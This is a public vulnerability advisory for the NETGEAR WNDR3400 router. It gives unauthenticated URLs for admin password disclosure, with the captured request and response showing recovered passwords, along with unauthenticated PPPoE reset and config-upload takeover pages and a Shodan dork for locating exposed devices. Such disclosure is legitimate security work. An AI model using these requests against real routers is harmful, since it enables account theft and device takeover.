Netgear N600 Password Disclosure / Account Reset

2014.04.16
Credit: Santhosh Kumar
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Title: Multiple vulnerabilities in NETGEAR N600 WIRELESS DUAL BAND WNDR3400 ==================================================================================== Notification Date: 4/14/2014 Affected Vendor: NETGEAR N600 WIRELESS DUAL BAND WNDR3400 Firmware Version: Firmware Version 1.0.0.38 AND BELOW (ALL versions affected) Issue Types: password Disclosure File Uploading with AuthPPOPE settings Change Discovered by: Santhosh Kumar twitter: @security_b0x Issue status: No Patch >From the Vendors. grettings: @Anami2111 (anamika singh) -- creator of wihawk ==================================================================================== Summary: ======== While i was lurking around the Netgear firmware today i came across various tweaking and others i was able to find a password disclosure,File uploading vulnerably which could compromise the entire router.as of now no patch from the vendor. Password Disclosure: ==================== url: server/unauth.cgi?id=393087602 Generating with the 401 unauthorised error poc: Host: server:8080 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://server:8080/ Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 0<p class="MNUTitle">Router Password Recovered</p> <table border="0" cellpadding="0" cellspacing="3" style="width:600px"> <col width="200" /> <col width="400" /> <tr> <td colspan="2" class="MNUText">You have successfully recovered the admin password.</td> </tr> <tr> <td class="MNUText" align="right">Router Admin Username</td> <td class="MNUText" align="left">admin</td> </tr> <tr> <td class="MNUText" align="right">Router Admin Password</td> <td class="MNUText" align="left">password</td> </tr> \<tr> poc2: server:8080/passwordrecovered.cgi?id=1738955828 <tr> <td colspan="2" class="MNUText">You have successfully recovered the admin password.</td> </tr> <tr> <td class="MNUText" align="right">Router Admin Username</td> <td class="MNUText" align="left">admin</td> </tr> <tr> <td class="MNUText" align="right">Router Admin Password</td> <td class="MNUText" align="left">0514</td> </tr> <tr> <td colspan="2" class="MNUText">You can now log in to the router using username "admin" and this recovered password.</td> </tr> <tr> ============================================================================================================================== Ppope account reset: Netgear runs a utility called "netgear genie" which does not have proper authentication on reaching "genie_pppoe.htm " which allows to reset the ppoe username which any basic authentication. http://server/genie_pppoe.htm ============================================================================================================================== File Upload (router reset): like the same one above the "http://server/genie_restore.htm" the config file can be uploaded which leading to reseting the control to attackers username and password. *.cfg file. ============================================================================================================================== SHODAN DORK: wndr3400: 10198 for wndr3400 ******************************************************************************************************************************


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top